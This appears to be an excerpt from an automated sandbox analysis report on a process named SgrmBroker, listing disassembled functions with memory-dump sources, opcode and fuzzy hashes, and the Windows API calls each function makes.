                                      Download Yara Rule

                                      Control-flow Graph

                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: edbe9f060606ffe35c92788d782bd49ef7c73d075efe538f5d00ada43bf70f72
                                      • Instruction ID: 4fd8bc6d98fb048f0b8820d9bb4ad37823175c68a4bb77e18a9e9810e25ef627
                                      • Opcode Fuzzy Hash: edbe9f060606ffe35c92788d782bd49ef7c73d075efe538f5d00ada43bf70f72
                                      • Instruction Fuzzy Hash: FD030070A0891C8FDB98DF19C494BA9B7F1FB68304F2081AED10EE7795CE759982CB54
                                      Function 00007FFD34A70AED Relevance: 1.0, Instructions: 952COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1abc147676880016ef71c6b645f4ddd81ef82f7f46e9309f5a76c2dd24f40098
                                      • Instruction ID: 7b7339e4280350728e5c4d4b7a02f834258495aaddb464b430d162935e899b2d
                                      • Opcode Fuzzy Hash: 1abc147676880016ef71c6b645f4ddd81ef82f7f46e9309f5a76c2dd24f40098
                                      • Instruction Fuzzy Hash: F4724F70E08A5D8FDBA4EF58C8A56A97BF1FF59305F1001B9D50DE3291DE38AA819F40
                                      Function 00007FFD348A1D55 Relevance: .7, Instructions: 702COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 90e9d4e28d18391fcbbefd8f038a9d6a763adcfc03d59ab9bd2e6f9f8ce0350e
                                      • Instruction ID: b189e57579a5943e304641a12cb9458adf745df1255d0708b7334e5068ce9b8b
                                      • Opcode Fuzzy Hash: 90e9d4e28d18391fcbbefd8f038a9d6a763adcfc03d59ab9bd2e6f9f8ce0350e
                                      • Instruction Fuzzy Hash: B0524B70A0861D8FDB98DF58D4A07F9B7B2FF59304F6081ADD50E97282CB39A946DB40
                                      Function 00007FFD348A0004 Relevance: 5.4, Strings: 4, Instructions: 397COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !Y_H$HAx4$HAx4$HAx4
                                      • API String ID: 0-1732287044
                                      • Opcode ID: 6dd532769f993c815df589ddb34efae96b4ad912b3191a5c90e5d7636a769869
                                      • Instruction ID: 401b0df794c8fdde38a435d59d5f75ab0b4216169ba88ff15449c210beffb287
                                      • Opcode Fuzzy Hash: 6dd532769f993c815df589ddb34efae96b4ad912b3191a5c90e5d7636a769869
                                      • Instruction Fuzzy Hash: 68E1D971E1591D8FEBA4EF58C8A97A977B1FB99301F4001FA940DE3292DE756E818F00
                                      Function 00007FFD34903778 Relevance: 3.0, Strings: 2, Instructions: 535COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34902000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34902000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34902000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: G_H$G_H
                                      • API String ID: 0-2928901359
                                      • Opcode ID: a1224128bd9e7a83693ceded3ce445940e65c563101e036ef8cf439f6c23b0a5
                                      • Instruction ID: a2ceb4a3ed6693506d39da5091e1cfffe63d2eaac4286d045a9c1b0b09ccfcdc
                                      • Opcode Fuzzy Hash: a1224128bd9e7a83693ceded3ce445940e65c563101e036ef8cf439f6c23b0a5
                                      • Instruction Fuzzy Hash: BF123C74E09A5D8FEBA4EB58C8A57ADB7F1FF59301F5001B9D00DE3296CA786881CB50
                                      Function 00007FFD348A0272 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 439 7ffd348a0272-7ffd348a0388 453 7ffd348a03da-7ffd348a03ec 439->453 454 7ffd348a038a-7ffd348a03cf 439->454 458 7ffd348a0536-7ffd348a0537 453->458 459 7ffd348a03f2-7ffd348a048d 453->459 454->453 462 7ffd348a053f-7ffd348a0547 458->462 468 7ffd348a0498-7ffd348a052b 459->468 468->458
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !Y_H$HAx4
                                      • API String ID: 0-3533136470
                                      • Opcode ID: 1de1ab9e4822045326797d03039e6b7ac32f430f204e44c33a74ac95861fa62f
                                      • Instruction ID: ca3b26fa5c40425bdb2b0007d7806e670a3d42fbb6372fe90e4c4519953b52fe
                                      • Opcode Fuzzy Hash: 1de1ab9e4822045326797d03039e6b7ac32f430f204e44c33a74ac95861fa62f
                                      • Instruction Fuzzy Hash: 0181F830A1595D8FEBA4EF58C8A97A9B7B1FF99301F4001FA940DE3292DE756D918F00
                                      Function 00007FFD3489B98A Relevance: 1.8, APIs: 1, Instructions: 295COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 791 7ffd3489b98a-7ffd3489b997 792 7ffd3489b999-7ffd3489b9a1 791->792 793 7ffd3489b9a2-7ffd3489ba68 791->793 792->793 797 7ffd3489ba6a-7ffd3489ba81 793->797 798 7ffd3489ba84-7ffd3489bba6 CreateFileTransactedW 793->798 797->798 799 7ffd3489bba8 798->799 800 7ffd3489bbae-7ffd3489bc30 798->800 799->800
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0
                                      • Opcode ID: 1ab3c08732bbd55a1c86c526203bdf29bf53919fd4042ba2828b273071400f5c
                                      • Instruction ID: 8cc35df577bf586111fd792e284903be28fef40d36c6f82eec72a131ca8c2295
                                      • Opcode Fuzzy Hash: 1ab3c08732bbd55a1c86c526203bdf29bf53919fd4042ba2828b273071400f5c
                                      • Instruction Fuzzy Hash: 5E912370908A5D8FDB99DF58C894BE9BBF1FB6A310F1011AED04DE3291DB75A980CB04
                                      Function 00007FFD34899FB0 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 803 7ffd34899fb0-7ffd3489ba68 808 7ffd3489ba6a-7ffd3489ba81 803->808 809 7ffd3489ba84-7ffd3489bba6 CreateFileTransactedW 803->809 808->809 810 7ffd3489bba8 809->810 811 7ffd3489bbae-7ffd3489bc30 809->811 810->811
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e52d9f29194764da87f89118d24befcddef471ea09a8ff7d200a3be886bc62e1
                                      • Instruction ID: 7290b3f1717ad065ef1942b8d4d15713cc2f2ef6b7dff71469d25504002f2cf6
                                      • Opcode Fuzzy Hash: e52d9f29194764da87f89118d24befcddef471ea09a8ff7d200a3be886bc62e1
                                      • Instruction Fuzzy Hash: C681E170908A1C8FDB98DF58C894BA9BBF1FB69300F1051AED04EE3651DB75A980CF44
                                      Function 00007FFD3489BC35 Relevance: 1.7, APIs: 1, Instructions: 218fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 814 7ffd3489bc35-7ffd3489bd02 818 7ffd3489bd2a-7ffd3489bdcd WriteFile 814->818 819 7ffd3489bd04-7ffd3489bd27 814->819 820 7ffd3489bdd5-7ffd3489be31 818->820 821 7ffd3489bdcf 818->821 819->818 821->820
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: d6006c4fc0a5a7056855abe3814f406afe4149e1ff9d5322337aee83333a5163
                                      • Instruction ID: bfc48896633a9a77bd5243370ce77ee7d67339f7915f4fc91703595aa07155e6
                                      • Opcode Fuzzy Hash: d6006c4fc0a5a7056855abe3814f406afe4149e1ff9d5322337aee83333a5163
                                      • Instruction Fuzzy Hash: 1E610570A08A5C8FDB98DF58C895BE9BBF1FB6A311F1041AED04DE3251DB74A985CB40
                                      Function 00007FFD3489D59A Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 823 7ffd3489d59a-7ffd3489d5a3 824 7ffd3489d5a5-7ffd3489d5cf 823->824 825 7ffd3489d5ed 823->825 827 7ffd3489d5f0-7ffd3489d6c3 GetSystemInfo 825->827 828 7ffd3489d5ef 825->828 832 7ffd3489d6c5 827->832 833 7ffd3489d6cb-7ffd3489d6fb 827->833 828->827 832->833
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: ef7377bd64c4255cefa39440539e348902d951ab55ad616c81e28dc85ae3fb67
                                      • Instruction ID: 028ea489e8a00763256b16fbfe10970be5d202f94e2b6227aea4ce4d4d8cdb32
                                      • Opcode Fuzzy Hash: ef7377bd64c4255cefa39440539e348902d951ab55ad616c81e28dc85ae3fb67
                                      • Instruction Fuzzy Hash: 5D419F71A08A4C8FDB98EF98D899BEDBBF4FF56314F14416AD00DD7252DA34A846CB40
                                      Function 00007FFD348FF1D7 Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 836 7ffd348ff1d7-7ffd348ff1e0 837 7ffd348ff22a-7ffd348ff2f2 ResumeThread 836->837 838 7ffd348ff1e2-7ffd348ff202 836->838 842 7ffd348ff2fa-7ffd348ff344 837->842 843 7ffd348ff2f4 837->843 843->842
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348FF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348ff000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: b46aa7fec0943316c57cbfe88f8ae288620adfeb166629d20326db4fc1590193
                                      • Instruction ID: 9980ed3ffecf6d85781cebfdea8ebc911230e22bc3b26eaa0201aebe12c2075a
                                      • Opcode Fuzzy Hash: b46aa7fec0943316c57cbfe88f8ae288620adfeb166629d20326db4fc1590193
                                      • Instruction Fuzzy Hash: 91412A74E0860C8FDB58EF98D895AEDBBF0FB5A310F10416AD40DE7251DA75A846CF50
                                      Function 00007FFD348FF205 Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 846 7ffd348ff205-7ffd348ff21d 847 7ffd348ff220-7ffd348ff2f2 ResumeThread 846->847 848 7ffd348ff21f 846->848 852 7ffd348ff2fa-7ffd348ff344 847->852 853 7ffd348ff2f4 847->853 848->847 853->852
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348FF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348ff000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 2bf798de35821d4ff054f0b61e86a129e39b8603aca9157003566482d060f4d9
                                      • Instruction ID: 56866d24f6f7a6b552793e536fb6a5d12274d7a75ab6db23176abd6b8f6784f8
                                      • Opcode Fuzzy Hash: 2bf798de35821d4ff054f0b61e86a129e39b8603aca9157003566482d060f4d9
                                      • Instruction Fuzzy Hash: A1417D70E0864C8FDB55DFA8D899AEDBBF0EF5A310F1041ABD049E7252DA349846CB51
                                      Function 00007FFD348FFC4D Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 856 7ffd348ffc4d-7ffd348ffd33 GetFileAttributesW 859 7ffd348ffd3b-7ffd348ffd79 856->859 860 7ffd348ffd35 856->860 860->859
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348FF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348ff000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: a1132f623acb594b1b68d13c4afc8074d64770638114c17ce0ecb93492cbd09f
                                      • Instruction ID: 7836bc43e6928b22ad0be62c13ff5bc43a35f7ae66734d03dc3779a112094de9
                                      • Opcode Fuzzy Hash: a1132f623acb594b1b68d13c4afc8074d64770638114c17ce0ecb93492cbd09f
                                      • Instruction Fuzzy Hash: 85414C70A0864C8FDB99DF98D499BEDBBF0FB5A310F10416ED049E7252DA749846CF41
                                      Function 00007FFD3489D5D1 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 862 7ffd3489d5d1-7ffd3489d5ed 864 7ffd3489d5f0-7ffd3489d6c3 GetSystemInfo 862->864 865 7ffd3489d5ef 862->865 869 7ffd3489d6c5 864->869 870 7ffd3489d6cb-7ffd3489d6fb 864->870 865->864 869->870
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: f308247eb4e8662b16017f7d0328eca11df538aa11ae3123197eae93dce63f10
                                      • Instruction ID: 0f9a1ebbf04c6b30f887e7240a64ea586d8b4aeedfd6f08f979f3e7e90ab0f75
                                      • Opcode Fuzzy Hash: f308247eb4e8662b16017f7d0328eca11df538aa11ae3123197eae93dce63f10
                                      • Instruction Fuzzy Hash: 64419F7090CA8C8FDB99DFA8D899BE9BBF0EF56310F0441ABD04DD7252CA345846CB40
                                      Function 00007FFD3489DA35 Relevance: 1.4, APIs: 1, Instructions: 192memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 32b2965e113f8a2509a917df1362e7a9411bff0554d729e39cd06a3632ba94b6
                                      • Instruction ID: 4b37f30cb9913e4d0100964cc9b765c137161126c8406400ab936d32d8c1a87d
                                      • Opcode Fuzzy Hash: 32b2965e113f8a2509a917df1362e7a9411bff0554d729e39cd06a3632ba94b6
                                      • Instruction Fuzzy Hash: 81512A70918A5C8FDF58EF58C895BE9BBF0FB6A314F1042AAD04DE3251DB70A985CB41
                                      Function 00007FFD348FF349 Relevance: 1.4, APIs: 1, Instructions: 145COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348FF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348ff000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 076562adf387c6cefe74ad77039730b709caa2dea6a0c8d4b41e9c0ac0d5c265
                                      • Instruction ID: dbbef02a2700051dad30706b37d1388ffa05d969bd19f21d51c80d96a2a5c765
                                      • Opcode Fuzzy Hash: 076562adf387c6cefe74ad77039730b709caa2dea6a0c8d4b41e9c0ac0d5c265
                                      • Instruction Fuzzy Hash: C4417070D0865C8FDB59DFA8D899BEDBBF0FF56310F10416AD049E7292DA34A845CB41
                                      Function 00007FFD34A75E8B Relevance: .9, Instructions: 922COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e6d6a11df36203dc103068c47b14f7232b8aca7e17ae8b24de2ad969b3064eb
                                      • Instruction ID: 5cf4b256312b76a8f7407f42b8f91cf82024b77da0159809cf07b8004bc99c32
                                      • Opcode Fuzzy Hash: 0e6d6a11df36203dc103068c47b14f7232b8aca7e17ae8b24de2ad969b3064eb
                                      • Instruction Fuzzy Hash: 06716F71E0DA4D8FEB94DBA8D8A46BC7BF0FF56315F14007AD109E7292CA79A841DB40
                                      Function 00007FFD34A7640D Relevance: .6, Instructions: 557COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 93b61125319ec7b37a85d4412a125b894ac760c918d5fc96bff550a378e22d2e
                                      • Instruction ID: fab056019ab05fd4e1f6ec8d7900595f90e8d521558d5bdf78a6951aa222f4c4
                                      • Opcode Fuzzy Hash: 93b61125319ec7b37a85d4412a125b894ac760c918d5fc96bff550a378e22d2e
                                      • Instruction Fuzzy Hash: B212A234A1865D8FDB54EFA8C8A57E9BBF1FF59314F1001BAD409E3292CA39A945CB40
                                      Function 00007FFD34A76470 Relevance: .5, Instructions: 503COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a59b49534e989c53b7c6dfb8e6aac503883b5b4c8d92ce201ef3fffb405f840
                                      • Instruction ID: 9d73adca2430caa6e3cef70162a48da81521ad5749be4aeea9436b156c074af2
                                      • Opcode Fuzzy Hash: 2a59b49534e989c53b7c6dfb8e6aac503883b5b4c8d92ce201ef3fffb405f840
                                      • Instruction Fuzzy Hash: 8DF1B231A1864D8FDB54EFA8C8A57EDBBF1FF59314F14417AD409E3292CA39A845CB40
                                      Function 00007FFD34A7654E Relevance: .5, Instructions: 498COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8bad94cdd772e604cbe0946ca4fe502a3501413c292e8abc270c5d6a711f0168
                                      • Instruction ID: 132808fbb70d745b306ad26c3976bb270994f49c8a7d58e49191e38e12c965b3
                                      • Opcode Fuzzy Hash: 8bad94cdd772e604cbe0946ca4fe502a3501413c292e8abc270c5d6a711f0168
                                      • Instruction Fuzzy Hash: 03F1B130A1864D8FDB54EFA8C8A57EDBBF1FF59314F1401BAD409E3292CA39A941CB40
                                      Function 00007FFD34A764EA Relevance: .5, Instructions: 492COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 654f1ca3e469af31552f7894c467be22946c4cdef76218d8cd7ed5c9eab504f6
                                      • Instruction ID: 9b2d3596e006250e477b1b3aa965eb120dd7d8324a90ea1a10992e0669ccb85e
                                      • Opcode Fuzzy Hash: 654f1ca3e469af31552f7894c467be22946c4cdef76218d8cd7ed5c9eab504f6
                                      • Instruction Fuzzy Hash: 5CF1B230A1865D8FDB54EFA8C8A57EDBBF1FF59314F1441BAD409E3292CA39A841CB40
                                      Function 00007FFD348A1DC8 Relevance: .4, Instructions: 418COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ce419eb6798a230d55d13638df34baa048e1634468bec1968084132326d878db
                                      • Instruction ID: e137c21b0eabf834e12a1cb191365d973e898f0b4f1fa9fd0fb74eb7a84744bf
                                      • Opcode Fuzzy Hash: ce419eb6798a230d55d13638df34baa048e1634468bec1968084132326d878db
                                      • Instruction Fuzzy Hash: A4F1D130A08A5D8FDB90EF68C490BA97BF0FF6A300F1441A9E50DD7291DB38E995DB50
                                      Function 00007FFD34A76678 Relevance: .4, Instructions: 369COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd8e3c2eed52dc22d3ca7e918190e48e88162662d6672e0c733a4b3e9f910b88
                                      • Instruction ID: d6eb63794958299ce7e2a5bd946cd9a01c588135d29e8c8fcb98add976f22649
                                      • Opcode Fuzzy Hash: bd8e3c2eed52dc22d3ca7e918190e48e88162662d6672e0c733a4b3e9f910b88
                                      • Instruction Fuzzy Hash: 55C19134A18A4D8FDB94EF98C8A57EDBBB1FF59314F50457AD40DE3292CA39A841CB40
                                      Function 00007FFD34A72400 Relevance: .3, Instructions: 268COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aa0f6071ad84a40143402c3e493601951d6ad1fcc725e148b7537140c053c273
                                      • Instruction ID: a927284255ccbb48e771bdd0aa74e65ec0aec33451a1d0b80c51e770b521e3e3
                                      • Opcode Fuzzy Hash: aa0f6071ad84a40143402c3e493601951d6ad1fcc725e148b7537140c053c273
                                      • Instruction Fuzzy Hash: 2681C872A4DA894FEBA4DF98DC656B97BF0FF5A304F1440BAD448D7193CA38A941C740
                                      Function 00007FFD348A1E00 Relevance: .2, Instructions: 244COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6872137cce2a5d52e983ec1d7920806ab511858c46be1fc7cc7f68d79b528c74
                                      • Instruction ID: d5a3854b0fc2315b128c3c2ff111b9560dd319de2c4f040f4191bdb1e28aedf5
                                      • Opcode Fuzzy Hash: 6872137cce2a5d52e983ec1d7920806ab511858c46be1fc7cc7f68d79b528c74
                                      • Instruction Fuzzy Hash: 4B910C30A1890E8FDF98EF58C4A5EAA77E1FF69300F144569E509D72A5CB34EC95CB80
                                      Function 00007FFD348A1DB0 Relevance: .2, Instructions: 218COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d054638e2b6324df6a38d2c8887ad7ce56e978b69aadb10bbd53026f0f160b95
                                      • Instruction ID: 487d728f71e0dc8591e4272d425b10ef9c23901d3643a7b77384bca4a74c0866
                                      • Opcode Fuzzy Hash: d054638e2b6324df6a38d2c8887ad7ce56e978b69aadb10bbd53026f0f160b95
                                      • Instruction Fuzzy Hash: 58711730A18A0D8FDF48EF59D496DA977E1FF69B00F404269E506D72A5CE34F881CB85
                                      Function 00007FFD34A748DD Relevance: .2, Instructions: 198COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 971324294f12bdd96e38267eb65e8c7c3aafebcdfb4d68169627898d5ba96fea
                                      • Instruction ID: 9aebad1bad8e603070500f10357f4b071d00534f79ab1cb4b1bec34e38b22e39
                                      • Opcode Fuzzy Hash: 971324294f12bdd96e38267eb65e8c7c3aafebcdfb4d68169627898d5ba96fea
                                      • Instruction Fuzzy Hash: E361C23191C68D8FDB95DFA4C8A46E97BB0FF16304F0441BAE458D3192CB78A954C781
                                      Function 00007FFD34A71A05 Relevance: .2, Instructions: 193COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
